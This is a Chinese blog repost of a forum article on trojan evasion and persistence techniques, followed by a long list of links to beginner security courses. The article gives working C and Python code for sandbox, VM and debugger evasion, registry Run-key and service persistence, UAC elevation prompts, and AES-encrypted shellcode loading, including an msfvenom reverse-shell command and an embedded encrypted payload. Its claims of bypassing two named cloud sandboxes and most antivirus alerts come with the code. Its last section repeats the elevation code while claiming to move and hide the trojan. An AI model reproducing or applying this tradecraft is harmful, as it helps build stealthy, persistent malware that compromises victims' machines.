一些木马反制技巧,从零基础到精通,收藏这篇就够了!

在信息安全攻防领域,木马程序 的隐藏与反制技术一直是研究的热点与难点。本篇文章深入探讨了恶意程序如何通过多种手段实现自我隐藏、逃避检测以及持久化运行。

文章作者:奇安信攻防社区(cike_y)

文章来源:https://forum.butian.net/share/4035

1

反沙箱

沙箱(Sandbox)是一种隔离机制,通过创建一个受控的、隔离的计算环境,允许软件在不影响宿主系统或网络的情况下运行和测试。这种技术在恶意程序分析中尤为重要,因为它能够安全地捕获和分析恶意软件的行为、特征及其对系统和网络的影响。在国内,常用的两个在线云沙箱分析平台是微步和安恒

https://s.threatbook.com/``https://sandbox.dbappsecurity.com.cn/

接下来的案例实战测试将基于这两个平台进行

在沙箱环境中,常用的应用程序(如QQ、微信、钉钉等)通常不存在。为了检测是否运行在沙箱环境中,可以写一个白名单机制。将所有常用软件的名称添加到白名单中,然后遍历当前系统中的进程。如果白名单中的程序没有一个在运行,则可以判定当前环境可能为沙箱,从而触发木马程序退出

#include <windows.h>``#include <tlhelp32.h>``#include <stdio.h>``#include <stdbool.h>``   ``bool is_process_running(const char* process_name) {`    `bool found = false;`    `HANDLE hProcessSnap;`    `PROCESSENTRY32 pe32;``   `    `hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);`    `if (hProcessSnap == INVALID_HANDLE_VALUE) {`        `return false;`    `}``   `    `pe32.dwSize = sizeof(PROCESSENTRY32);``   `    `if (!Process32First(hProcessSnap, &pe32)) {`        `CloseHandle(hProcessSnap);`        `return false;`    `}``   `    `do {`        `if (strcmp(pe32.szExeFile, process_name) == 0) {`            `found = true;`            `break;`        `}`    `} while (Process32Next(hProcessSnap, &pe32));``   `    `CloseHandle(hProcessSnap);`    `return found;``}``   ``int main() {`    `if (!is_process_running("qq.exe") && !is_process_running("wechat.exe")) {`        `return 0;`    `}``   `    `return 0;``}

使用CreateToolhelp32Snapshot函数获取系统中所有进程的快照,然后用Process32First 函数获取第一个进程的信息,Process32Next 函数遍历剩余的进程 , 比较每个进程的名称(pe32.szExeFile)与 process_name,如果匹配则设置 foundtrue 并退出循环

实战测试,这两个云沙箱平台都无法正常运行程序,成功绕过沙箱

2

反虚拟机

在手动分析恶意软件时,通常是在虚拟机环境中进行的。为检测程序是否在虚拟机中运行,可以读取特定的注册表信息。如果检测到当前程序正在虚拟机中运行,则自动退出程序,以避免分析和调试

#include <windows.h>``#include <stdio.h>``   ``int IsRunningInVM() {`    `char szHardware[256];`    `DWORD size = sizeof(szHardware);`    `int isVM = 0;``   `    `if (RegGetValueA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Enum\\IDE", "HardwareID", RRF_RT_REG_SZ, NULL, szHardware, &size) == ERROR_SUCCESS) {`        `if (strstr(szHardware, "VMware") || strstr(szHardware, "Virtual")) {`            `isVM = 1;`        `}`    `}``   `    `size = sizeof(szHardware);`    `if (RegGetValueA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum", "0", RRF_RT_REG_SZ, NULL, szHardware, &size) == ERROR_SUCCESS) {`        `if (strstr(szHardware, "VMware") || strstr(szHardware, "VBOX")) {`            `isVM = 1;`        `}`    `}``   `    `return isVM;``}``int main(int argc, char *argv[]) {`    `if (IsRunningInVM()) {`        `return 0;`    `}

RegGetValueA 被调用以从注册表路径 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\IDE 中检索 HardwareID 的值, 如果调用成功(返回 ERROR_SUCCESS),则检查检索到的字符串(szHardware)是否包含子字符串 “VMware” 或 “Virtual” , 如果找到任一子字符串,则将 isVM 设置为 1 ,第二个if判断同理

如果返回1,则代表程序在虚拟机里运行,执行退出指令

3

反调试

使用IsDebuggerPresent函数可以防止逆向工程工具进行动态调试

#include <windows.h>``#include <stdio.h>``   ``void checkDebugger() {`    `if (IsDebuggerPresent()) {`        `ExitProcess(1);``}``   ``int main() {`    `checkDebugger();`    `return 0;``}

IsDebuggerPresent() 返回非零值,意味着检测到调试器,程序将调用 ExitProcess(1)退出程序,实测xdbg调试程序时会触发退出

4

添加到开机启动项

"Software\\Microsoft\\Windows\\CurrentVersion\\Run" 是一个注册表路径,用于存储当前用户登录时自动运行的程序。我们可以将当前程序的路径写入该注册表项,以实现开机自启动功能

#include <windows.h>``#include <stdio.h>``   ``void add_to_startup(const char *appname, const char *path) {`    `HKEY hKey;`    `LONG result;``   `    `result = RegOpenKeyEx(HKEY_CURRENT_USER,`                          `"Software\\Microsoft\\Windows\\CurrentVersion\\Run",`                          `0, KEY_SET_VALUE, &hKey);``   `    `if (result != ERROR_SUCCESS) {`        `return;`    `}``   `    `result = RegSetValueEx(hKey, appname, 0, REG_SZ, (BYTE *)path, strlen(path) + 1);``   `    `RegCloseKey(hKey);``}``   ``int main(int argc, char *argv[]) {`    `char path[MAX_PATH];`    `if (GetModuleFileName(NULL, path, MAX_PATH) == 0) {`        `return 1;`    `}`    `add_to_startup("MyAppName", path);``}

实测写入注册表时只有360会有提示,火绒和defender不会弹出提示

5

AES混淆shellcode

首先需要cs或者msf生成raw格式的shellcode源文件,这里用msf举例

msfvenom -p  windows/x64/shell_reverse_tcp lhost=192.168.0.110 lport=8888 -f raw -o msf.bin

然后用python脚本生成aes加密的key和加密后的shellcode

import sys``from Crypto.Cipher import AES``from Crypto.Util.Padding import pad``from os import urandom``import hashlib``   ``def AESencrypt(plaintext, key):`    `k = hashlib.sha256(KEY).digest()`    `iv = 16 * b'\x00'`    `plaintext = pad(plaintext, AES.block_size)`    `cipher = AES.new(k, AES.MODE_CBC, iv)`    `ciphertext = cipher.encrypt(plaintext)`    `return ciphertext,key``   ``def printResult(key, ciphertext):`    `print('char AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')`    `print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')``   ``try:`    `file = open(sys.argv[1], "rb")`    `content = file.read()``except:`    `print("Usage: .\AES_cryptor.py PAYLOAD_FILE")`    `sys.exit()``   ``KEY = urandom(16)``ciphertext, key = AESencrypt(content, KEY)``   ``printResult(KEY,ciphertext)


在木马里写入aes解密脚本即可

#include <windows.h>``#include <string.h>``#include <stdlib.h>``#include <stdio.h>``#include <wincrypt.h>``#include <shlobj.h>``#pragma comment(lib, "crypt32.lib")``#pragma comment(lib, "advapi32.lib")``   ``void aes(char* code, DWORD codeLen, char* key, DWORD keyLen) {`    `HCRYPTPROV hProv;`    `HCRYPTHASH hHash;`    `HCRYPTKEY hKey;``   `    `if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {`        `return;`    `}`    `if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {`        `return;`    `}`    `if (!CryptHashData(hHash, (BYTE*)key, keyLen, 0)) {`        `return;`    `}`    `if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {`        `return;`    `}``   `    `if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)code, &codeLen)) {`        `return;`    `}``   `    `CryptReleaseContext(hProv, 0);`    `CryptDestroyHash(hHash);`    `CryptDestroyKey(hKey);``}``int main(int argc, char *argv[]) {`        `unsigned char key[] = { 0xed, 0x39, 0x56, 0x67, 0xcd, 0x62, 0xf7, 0x91, 0x62, 0xb, 0x85, 0x53, 0x9b, 0x17, 0xae, 0xc9 };`        `unsigned char code[] = {0xa0, 0x82, 0xa3, 0xbf, 0xce, 0xd5, 0xd5, 0xce, 0x0, 0xf8, 0xc1, 0x34, 0x7f, 0x39, 0xcf, 0xdb, 0xf2, 0xd3, 0x72, 0x2c, 0xf2, 0x8c, 0xf7, 0xc4, 0xaf, 0x66, 0xb7, 0x82, 0xb8, 0xbe, 0x3, 0x31, 0xfc, 0x3d, 0x58, 0xd0, 0x99, 0xda, 0xdf, 0xc2, 0x3, 0xd, 0xa3, 0x3d, 0x59, 0xb, 0x73, 0x4b, 0x38, 0xa6, 0x1e, 0xd7, 0xd7, 0x9f, 0x63, 0x84, 0xb8, 0xe2, 0x0, 0x53, 0x21, 0x7f, 0x17, 0x67, 0xfc, 0xc7, 0xd0, 0x72, 0x5e, 0x86, 0xff, 0xa4, 0x8d, 0x47, 0x53, 0xa0, 0x4, 0xee, 0x6e, 0x16, 0xe9, 0x4e, 0x15, 0x2, 0x6a, 0x84, 0x8c, 0x59, 0xd1, 0xb0, 0x16, 0x3b, 0x78, 0x6a, 0x4a, 0x16, 0xfe, 0x44, 0x47, 0x4e, 0x86, 0x97, 0xb6, 0x3b, 0xaa, 0xff, 0xab, 0x4, 0x80, 0x54, 0x5e, 0xbd, 0x8f, 0x88, 0x8c, 0x34, 0xdb, 0xe8, 0xfd, 0x49, 0xe9, 0x16, 0x1f, 0xff, 0x64, 0xb3, 0xe0, 0xce, 0x43, 0xb1, 0x6f, 0x55, 0xba, 0x68, 0x30, 0xc8, 0x77, 0x63, 0xc9, 0xf0, 0x23, 0x75, 0xe, 0x82, 0xc2, 0x76, 0x87, 0x3e, 0x43, 0xcd, 0x3b, 0xb6, 0x97, 0x33, 0x2, 0x7c, 0x12, 0x5e, 0xd3, 0x74, 0x85, 0xc5, 0x24, 0x42, 0x45, 0x53, 0xda, 0x4a, 0x3e, 0x95, 0x40, 0x57, 0x8d, 0xd5, 0x70, 0x6, 0xb8, 0x3f, 0xa4, 0x67, 0x4, 0x42, 0xaa, 0x61, 0x31, 0x70, 0x2a, 0x28, 0x9, 0x70, 0xdd, 0xd1, 0xf2, 0x73, 0xd2, 0x2f, 0x38, 0xd4, 0x22, 0xab, 0x68, 0xd2, 0x63, 0x47, 0xb3, 0x3a, 0xee, 0xa9, 0x6f, 0x53, 0x83, 0xb6, 0x4e, 0x25, 0xbf, 0x18, 0x41, 0xf8, 0x3e, 0xcd, 0x3b, 0x97, 0x8, 0xb3, 0x18, 0x5c, 0x59, 0xbf, 0xc6, 0x7a, 0xa, 0x6d, 0x80, 0x9b, 0xa3, 0x24, 0x89, 0x8, 0x6a, 0x27, 0x1a, 0x25, 0x92, 0x12, 0x81, 0x57, 0x90, 0x6, 0x17, 0x92, 0xaa, 0x7e, 0x5d, 0x7, 0xf8, 0xd1, 0x38, 0x74, 0x4f, 0xab, 0xb2, 0xc1, 0x15, 0xf8, 0x65, 0xf1, 0x59, 0x68, 0x0, 0x14, 0x58, 0x86, 0xcf, 0xc4, 0x3a, 0x3b, 0xbb, 0xc1, 0xc5, 0xdb, 0xef, 0x22, 0x85, 0x5, 0xdc, 0x89, 0x1e, 0xc6, 0x50, 0x81, 0x8, 0xd, 0x22, 0xab, 0xd8, 0x7d, 0xc6, 0x3c, 0xad, 0x49, 0x10, 0xdf, 0x6e, 0x92, 0x88, 0x99, 0xb8, 0x5d, 0xa6, 0xe3, 0x2d, 0xb7, 0x4c, 0xc6, 0xbb, 0xce, 0xd5, 0x4c, 0x5f, 0x7c, 0x22, 0xcb, 0xe7, 0x56, 0x12, 0xd9, 0xe6, 0x43, 0x3e, 0xa7, 0xc2, 0xca, 0xf6, 0x11, 0x10, 0x2b, 0xd5, 0xa9, 0xe2, 0x9d, 0x53, 0xb3, 0xcf, 0x46, 0xca, 0x65, 0xb0, 0x3a, 0xa4, 0x29, 0x18, 0x53, 0x68, 0xfc, 0xe6, 0xcf, 0xa6, 0xdb, 0x80, 0xae, 0x84, 0x98, 0x99, 0x2e, 0x88, 0xac, 0x7, 0x75, 0x35, 0x9d, 0x24, 0x59, 0x6b, 0x4f, 0x78, 0x34, 0xef, 0x2b, 0x19, 0x72, 0x34, 0x1a, 0x52, 0x46, 0xe9, 0x50, 0x26, 0x12, 0xee, 0x10, 0xd, 0x6d, 0x3, 0x8b, 0x73, 0x21, 0x11, 0x22, 0x3d, 0x17, 0xe2, 0x39, 0x5c, 0x6, 0xd7, 0x21, 0xad, 0xd1, 0x8f, 0xd2, 0x5f, 0xd2, 0xeb, 0x20, 0xd1, 0x1c, 0x7c, 0x64, 0xb9, 0xa9, 0x76, 0x1d, 0xfa, 0xbc, 0x10, 0x13, 0x67, 0x8f, 0x71, 0xf9, 0x1d, 0x74, 0xb5, 0xf2, 0xd6, 0xed, 0xd4, 0xcf, 0xc, 0x4f, 0xb1, 0x3, 0x7b, 0x6f, 0x55, 0x13, 0x62, 0x1c, 0x3b, 0x17, 0xe6, 0xa2, 0xbf, 0x23, 0x5d, 0x5, 0x7a, 0x9d, 0x39, 0x87, 0x51, 0x13, 0xd9, 0xae, 0xbb, 0xb, 0xa8, 0xfd, 0x6c, 0x55, 0xde, 0x18, 0x4c, 0x98, 0xe1, 0x31, 0x7b, 0xd1, 0x37, 0xbd, 0x91, 0xc6, 0x63, 0x92, 0x61, 0xb9, 0x75, 0xb4, 0xdc, 0xcf, 0xb9, 0xfe, 0x5b, 0xb4, 0x5d, 0xd4, 0x22, 0x6e, 0x8d, 0xc0, 0xd, 0xce, 0x97, 0xd8, 0x8b, 0x40, 0x5c, 0x1c, 0xcb, 0x3, 0xb8, 0xe9, 0x30, 0x49, 0x95, 0xe0, 0x3d, 0x13, 0xd, 0x14, 0x15, 0xb9, 0x6b, 0xbd, 0x9, 0xfc, 0x77, 0x4d, 0xac, 0xb, 0x28, 0x69, 0xd5, 0xec, 0x7, 0x47, 0x50, 0x2, 0x9c, 0x10, 0x11, 0xf7, 0xe, 0x55, 0x4, 0xa3, 0x7e, 0x5b, 0x96, 0x36, 0x6b, 0x62, 0xf6, 0x65, 0x18, 0x44, 0x82, 0x52, 0x98, 0x98, 0x9f, 0x8e, 0x5f, 0xc1, 0x92, 0x56, 0xc0, 0xb4, 0x54, 0x8c, 0x65, 0xfe, 0xb6, 0xc6, 0x26, 0x4, 0x9e, 0xf0, 0xa7, 0x75, 0x95, 0x1e, 0x8e, 0xd1, 0xb0, 0x41, 0x83, 0xe, 0x79, 0xa9, 0x1b, 0x28, 0x68, 0x75, 0x8a, 0xd0, 0x38, 0x8b, 0x47, 0x5a, 0xc2, 0xe, 0x6d, 0x96, 0x6e, 0xe7, 0x45, 0xe1, 0x7e, 0x95, 0x80, 0xf3, 0xc4, 0xce, 0xc5, 0x11, 0x70, 0x63, 0x36, 0x79, 0x5c, 0x9e, 0x4f, 0x35, 0xe2, 0x6d, 0x28, 0x4, 0x9d, 0xdb, 0x2a, 0x2d, 0x8b, 0x5f, 0xcf, 0xb0, 0xda, 0xab, 0x10, 0x9b, 0xec, 0xaf, 0x13, 0x34, 0xe8, 0x65, 0x2b, 0x6f, 0xf4, 0xc9, 0x43, 0x35, 0x6c, 0x56, 0x2f, 0xa9};``   `        `DWORD code_length = sizeof(code);`        `aes((char*)code, code_length, key, sizeof(key));`        `//现在解密了shellcode,之后运行code函数即可``   ``}

6

开机自启动服务注册

windows服务注册需要管理员权限,可以提权后或者弹框申请管理员权限运行后再执行注册服务功能

#include <windows.h>``#include <string.h>``#include <stdlib.h>``#include <stdio.h>``#include <wincrypt.h>``#include <shlobj.h>``#pragma comment(lib, "crypt32.lib")``#pragma comment(lib, "advapi32.lib")``   ``void CreateServiceToRunAtStartup() {`    `SC_HANDLE schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);`    `if (schSCManager == NULL) {`        `return;`    `}``   `    `char path[MAX_PATH];`    `SHGetSpecialFolderPath(NULL, path, CSIDL_WINDOWS, FALSE);`    `strcat(path, "\\host.exe");``   `    `SC_HANDLE schService = CreateService(`        `schSCManager,``         "host",  ``         "host",  ``         SERVICE_ALL_ACCESS,  ``         SERVICE_WIN32_OWN_PROCESS,  ``         SERVICE_AUTO_START,  ``         SERVICE_ERROR_NORMAL,  ``         path,  ``        NULL, NULL, NULL, NULL, NULL);``   `    `if (schService == NULL) {`        `CloseServiceHandle(schSCManager);`        `return;`    `}``   `    `CloseServiceHandle(schService);`    `CloseServiceHandle(schSCManager);``}``   ``int main(int argc, char *argv[]) {`  `CreateServiceToRunAtStartup(); //会将当前程序注册一个名叫host.exe的windows服务,并且开机自启动``}

7

弹窗申请管理员权限运行

#include <windows.h>``#include <string.h>``#include <stdlib.h>``#include <stdio.h>``#include <wincrypt.h>``#pragma comment(lib, "crypt32.lib")``   ``BOOL IsRunAsAdministrator() {`    `BOOL fIsRunAsAdmin = FALSE;`    `PSID pAdministratorsGroup = NULL;``   `    `SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;`    `if (AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS,``        0, 0, 0, 0, 0, 0, &pAdministratorsGroup)) {`        `CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin);`        `FreeSid(pAdministratorsGroup);`    `}``   `    `return fIsRunAsAdmin;``}``   ``void ElevatePrivileges() {`    `if (!IsRunAsAdministrator()) {`        `char szPath[MAX_PATH];`        `if (GetModuleFileName(NULL, szPath, ARRAYSIZE(szPath))) {`            `SHELLEXECUTEINFO sei = { sizeof(sei) };`            `sei.lpVerb = "runas";`            `sei.lpFile = szPath;`            `sei.hwnd = NULL;`            `sei.nShow = SW_NORMAL;`            `if (!ShellExecuteEx(&sei)) {`                `exit(1);`            `}`            `exit(0);`        `}`    `}``}``int main(int argc, char *argv[]) {`    `ElevatePrivileges();``}

效果是这样,双击运行后会弹框申请管理员权限运行

8

木马程序移动隐藏

#include <windows.h>``#include <string.h>``#include <stdlib.h>``#include <stdio.h>``#include <wincrypt.h>``#pragma comment(lib, "crypt32.lib")``   ``BOOL IsRunAsAdministrator() {`    `BOOL fIsRunAsAdmin = FALSE;`    `PSID pAdministratorsGroup = NULL;``   `    `SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;`    `if (AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS,``        0, 0, 0, 0, 0, 0, &pAdministratorsGroup)) {`        `CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin);`        `FreeSid(pAdministratorsGroup);`    `}``   `    `return fIsRunAsAdmin;``}``   ``void ElevatePrivileges() {`    `if (!IsRunAsAdministrator()) {`        `char szPath[MAX_PATH];`        `if (GetModuleFileName(NULL, szPath, ARRAYSIZE(szPath))) {`            `SHELLEXECUTEINFO sei = { sizeof(sei) };`            `sei.lpVerb = "runas";`            `sei.lpFile = szPath;`            `sei.hwnd = NULL;`            `sei.nShow = SW_NORMAL;`            `if (!ShellExecuteEx(&sei)) {`                `exit(1);`            `}`            `exit(0);`        `}`    `}``}``int main(int argc, char *argv[]) {`    `ElevatePrivileges();``}

运行后将木马转移到了c:/windows目录下,改名为host.exe

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

黑客/网络安全学习路线

对于从来没有接触过黑客/网络安全的同学,目前网络安全、信息安全也是计算机大学生毕业薪资相对较高的学科。

大白也帮大家准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」「收藏」「在看」「赞」**

网络安全/渗透测试法律法规必知必会****

今天大白就帮想学黑客/网络安全技术的朋友们入门必须先了解法律法律。

【网络安全零基础入门必知必会】网络安全行业分析报告(01)

【网络安全零基础入门必知必会】什么是黑客、白客、红客、极客、脚本小子?(02)

【网络安全零基础入门必知必会】网络安全市场分类(03)

【网络安全零基础入门必知必会】常见的网站攻击方式(04)

【网络安全零基础入门必知必会】网络安全专业术语全面解析(05)

【网络安全入门必知必会】《中华人民共和国网络安全法》(06)

【网络安全零基础入门必知必会】《计算机信息系统安全保护条例》(07)

【网络安全零基础入门必知必会】《中国计算机信息网络国际联网管理暂行规定》(08)

【网络安全零基础入门必知必会】《计算机信息网络国际互联网安全保护管理办法》(09)

【网络安全零基础入门必知必会】《互联网信息服务管理办法》(10)

【网络安全零基础入门必知必会】《计算机信息系统安全专用产品检测和销售许可证管理办法》(11)

【网络安全零基础入门必知必会】《通信网络安全防护管理办法》(12)

【网络安全零基础入门必知必会】《中华人民共和国国家安全法》(13)

【网络安全零基础入门必知必会】《中华人民共和国数据安全法》(14)

【网络安全零基础入门必知必会】《中华人民共和国个人信息保护法》(15)

【网络安全零基础入门必知必会】《网络产品安全漏洞管理规定》(16)

网络安全/渗透测试linux入门必知必会

【网络安全零基础入门必知必会】什么是Linux?Linux系统的组成与版本?什么是命令(01)

【网络安全零基础入门必知必会】VMware下载安装,使用VMware新建虚拟机,远程管理工具(02)

【网络安全零基础入门必知必会】VMware常用操作指南(非常详细)零基础入门到精通,收藏这一篇就够了(03)

【网络安全零基础入门必知必会】CentOS7安装流程步骤教程(非常详细)零基入门到精通,收藏这一篇就够了(04)

【网络安全零基础入门必知必会】Linux系统目录结构详细介绍(05)

【网络安全零基础入门必知必会】Linux 命令大全(非常详细)零基础入门到精通,收藏这一篇就够了(06)

【网络安全零基础入门必知必会】linux安全加固(非常详细)零基础入门到精通,收藏这一篇就够了(07)

网络安全/渗透测试****计算机网络入门必知必会****

【网络安全零基础入门必知必会】TCP/IP协议深入解析(非常详细)零基础入门到精通,收藏这一篇就够了(01)

【网络安全零基础入门必知必会】什么是HTTP数据包&Http数据包分析(非常详细)零基础入门到精通,收藏这一篇就够了(02)

【网络安全零基础入门必知必会】计算机网络—子网划分、子网掩码和网关(非常详细)零基础入门到精通,收藏这一篇就够了(03)

网络安全/渗透测试入门之HTML入门必知必会

【网络安全零基础入门必知必会】什么是HTML&HTML基本结构&HTML基本使用(非常详细)零基础入门到精通,收藏这一篇就够了1

【网络安全零基础入门必知必会】VScode、PhpStorm的安装使用、Php的环境配置,零基础入门到精通,收藏这一篇就够了2

【网络安全零基础入门必知必会】HTML之编写登录和文件上传(非常详细)零基础入门到精通,收藏这一篇就够了3

网络安全/渗透测试入门之Javascript入门必知必会

【网络安全零基础入门必知必会】Javascript语法基础(非常详细)零基础入门到精通,收藏这一篇就够了(01)

【网络安全零基础入门必知必会】Javascript实现Post请求、Ajax请求、输出数据到页面、实现前进后退、文件上传(02)

网络安全/渗透测试入门之Shell入门必知必会

【网络安全零基础入门必知必会】Shell编程基础入门(非常详细)零基础入门到精通,收藏这一篇就够了(第七章)

网络安全/渗透测试入门之PHP入门必知必会

【网络安全零基础入门】PHP环境搭建、安装Apache、安装与配置MySQL(非常详细)零基础入门到精通,收藏这一篇就够(01)

【网络安全零基础入门】PHP基础语法(非常详细)零基础入门到精通,收藏这一篇就够了(02)

【网络安全零基础入门必知必会】PHP+Bootstrap实现表单校验功能、PHP+MYSQL实现简单的用户注册登录功能(03)

网络安全/渗透测试入门之MySQL入门必知必会

【网络安全零基础入门必知必会】MySQL数据库基础知识/安装(非常详细)零基础入门到精通,收藏这一篇就够了(01)

【网络安全零基础入门必知必会】SQL语言入门(非常详细)零基础入门到精通,收藏这一篇就够了(02)

【网络安全零基础入门必知必会】MySQL函数使用大全(非常详细)零基础入门到精通,收藏这一篇就够了(03)

【网络安全零基础入门必知必会】MySQL多表查询语法(非常详细)零基础入门到精通,收藏这一篇就够了(04)

****网络安全/渗透测试入门之Python入门必知必会

【网络安全零基础入门必知必会】之Python+Pycharm安装保姆级教程,Python环境配置使用指南,收藏这一篇就够了【1】

【网络安全零基础入门必知必会】之Python编程入门教程(非常详细)零基础入门到精通,收藏这一篇就够了(2)

python开发之手写第一个python程序

python开发笔记之变量

python基础语法特征

python开发数据类型

python开发笔记之程序交互

python入门教程之python开发学习笔记基本数据类型

python入门教程之python开发笔记之格式化输出

python入门教程之python开发笔记基本运算符

python入门教程python开发基本流程控制if … else

python入门教程之python开发笔记流程控制之循环

python入门之Pycharm开发工具的使用

python入门教程之python字符编码转换

python入门之python开发字符编码

python入门之python开发基本数据类型数字

python入门python开发基本数据类型字符串

python入门python开发基本数据类型列表

python入门python开发基本数据类型

python入门教程之python开发可变和不可变数据类型和hash

python入门教程python开发字典数据类型

python入门之python开发笔记基本数据类型集合

python开发之collections模块

python开发笔记之三元运算

【网络安全零基础入门必知必会】之10个python爬虫入门实例(非常详细)零基础入门到精通,收藏这一篇就够了(3)

****网络安全/渗透测试入门之SQL注入入门必知必会

【网络安全渗透测试零基础入门必知必会】之初识SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了(1)

【网络安全渗透测试零基础入门必知必会】之SQL手工注入基础语法&工具介绍(2)

【网络安全渗透测试零基础入门必知必会】之SQL注入实战(非常详细)零基础入门到精通,收藏这一篇就够了(3)

【网络安全渗透测试零基础入门必知必会】之SQLmap安装&实战(非常详细)零基础入门到精通,收藏这一篇就够了(4)

【网络安全渗透测试零基础入门必知必会】之SQL防御(非常详细)零基础入门到精通,收藏这一篇就够了(4)

****网络安全/渗透测试入门之XSS攻击入门必知必会

【网络安全渗透测试零基础入门必知必会】之XSS攻击基本概念和原理介绍(非常详细)零基础入门到精通,收藏这一篇就够了(1)

网络安全渗透测试零基础入门必知必会】之XSS攻击获取用户cookie和用户密码(实战演示)零基础入门到精通收藏这一篇就够了(2)

【网络安全渗透测试零基础入门必知必会】之XSS攻击获取键盘记录(实战演示)零基础入门到精通收藏这一篇就够了(3)

【网络安全渗透测试零基础入门必知必会】之xss-platform平台的入门搭建(非常详细)零基础入门到精通,收藏这一篇就够了4

【网络安全渗透测试入门】之XSS漏洞检测、利用和防御机制XSS游戏(非常详细)零基础入门到精通,收藏这一篇就够了5

****网络安全/渗透测试入门文件上传攻击与防御入门必知必会

【网络安全渗透测试零基础入门必知必会】之什么是文件包含漏洞&分类(非常详细)零基础入门到精通,收藏这一篇就够了1

【网络安全渗透测试零基础入门必知必会】之cve实际漏洞案例解析(非常详细)零基础入门到精通, 收藏这一篇就够了2

【网络安全渗透测试零基础入门必知必会】之PHP伪协议精讲(文件包含漏洞)零基础入门到精通,收藏这一篇就够了3

【网络安全渗透测试零基础入门必知必会】之如何搭建 DVWA 靶场保姆级教程(非常详细)零基础入门到精通,收藏这一篇就够了4

【网络安全渗透测试零基础入门必知必会】之Web漏洞-文件包含漏洞超详细全解(附实例)5

【网络安全渗透测试零基础入门必知必会】之文件上传漏洞修复方案6

****网络安全/渗透测试入门CSRF渗透与防御必知必会

【网络安全渗透测试零基础入门必知必会】之CSRF漏洞概述和原理(非常详细)零基础入门到精通, 收藏这一篇就够了1

【网络安全渗透测试零基础入门必知必会】之CSRF攻击的危害&分类(非常详细)零基础入门到精通, 收藏这一篇就够了2

【网络安全渗透测试零基础入门必知必会】之XSS与CSRF的区别(非常详细)零基础入门到精通, 收藏这一篇就够了3

【网络安全渗透测试零基础入门必知必会】之CSRF漏洞挖掘与自动化工具(非常详细)零基础入门到精通,收藏这一篇就够了4

【网络安全渗透测试零基础入门必知必会】之CSRF请求伪造&Referer同源&置空&配合XSS&Token值校验&复用删除5

****网络安全/渗透测试入门SSRF渗透与防御必知必会

【网络安全渗透测试零基础入门必知必会】之SSRF漏洞概述及原理(非常详细)零基础入门到精通,收藏这一篇就够了 1

【网络安全渗透测试零基础入门必知必会】之SSRF相关函数和协议(非常详细)零基础入门到精通,收藏这一篇就够了2

【网络安全渗透测试零基础入门必知必会】之SSRF漏洞原理攻击与防御(非常详细)零基础入门到精通,收藏这一篇就够了3**
**

****网络安全/渗透测试入门XXE渗透与防御必知必会

【网络安全渗透测试零基础入门必知必会】之XML外部实体注入(非常详细)零基础入门到精通,收藏这一篇就够了1

网络安全渗透测试零基础入门必知必会】之XXE的攻击与危害(非常详细)零基础入门到精通,收藏这一篇就够了2

【网络安全渗透测试零基础入门必知必会】之XXE漏洞漏洞及利用方法解析(非常详细)零基础入门到精通,收藏这一篇就够了3

【网络安全渗透测试零基础入门必知必会】之微信XXE安全漏洞处理(非常详细)零基础入门到精通,收藏这一篇就够了4

****网络安全/渗透测试入门远程代码执行渗透与防御必知必会

【网络安全渗透测试零基础入门必知必会】之远程代码执行原理介绍(非常详细)零基础入门到精通,收藏这一篇就够了1

【网络安全零基础入门必知必会】之CVE-2021-4034漏洞原理解析(非常详细)零基础入门到精通,收藏这一篇就够了2

【网络安全零基础入门必知必会】之PHP远程命令执行与代码执行原理利用与常见绕过总结3

【网络安全零基础入门必知必会】之WEB安全渗透测试-pikachu&DVWA靶场搭建教程,零基础入门到精通,收藏这一篇就够了4

****网络安全/渗透测试入门反序列化渗透与防御必知必会

【网络安全零基础入门必知必会】之什么是PHP对象反序列化操作(非常详细)零基础入门到精通,收藏这一篇就够了1

【网络安全零基础渗透测试入门必知必会】之php反序列化漏洞原理解析、如何防御此漏洞?如何利用此漏洞?2

【网络安全渗透测试零基础入门必知必会】之Java 反序列化漏洞(非常详细)零基础入门到精通,收藏这一篇就够了3

【网络安全渗透测试零基础入门必知必会】之Java反序列化漏洞及实例解析(非常详细)零基础入门到精通,收藏这一篇就够了4

【网络安全渗透测试零基础入门必知必会】之CTF题目解析Java代码审计中的反序列化漏洞,以及其他漏洞的组合利用5

网络安全/渗透测试**入门逻辑漏洞必知必会**

【网络安全渗透测试零基础入门必知必会】之一文带你0基础挖到逻辑漏洞(非常详细)零基础入门到精通,收藏这一篇就够了

网络安全/渗透测试入门暴力猜解与防御必知必会

【网络安全渗透测试零基础入门必知必会】之密码安全概述(非常详细)零基础入门到精通,收藏这一篇就够了1

【网络安全渗透测试零基础入门必知必会】之什么样的密码是不安全的?(非常详细)零基础入门到精通,收藏这一篇就够了2

【网络安全渗透测试零基础入门必知必会】之密码猜解思路(非常详细)零基础入门到精通,收藏这一篇就够了

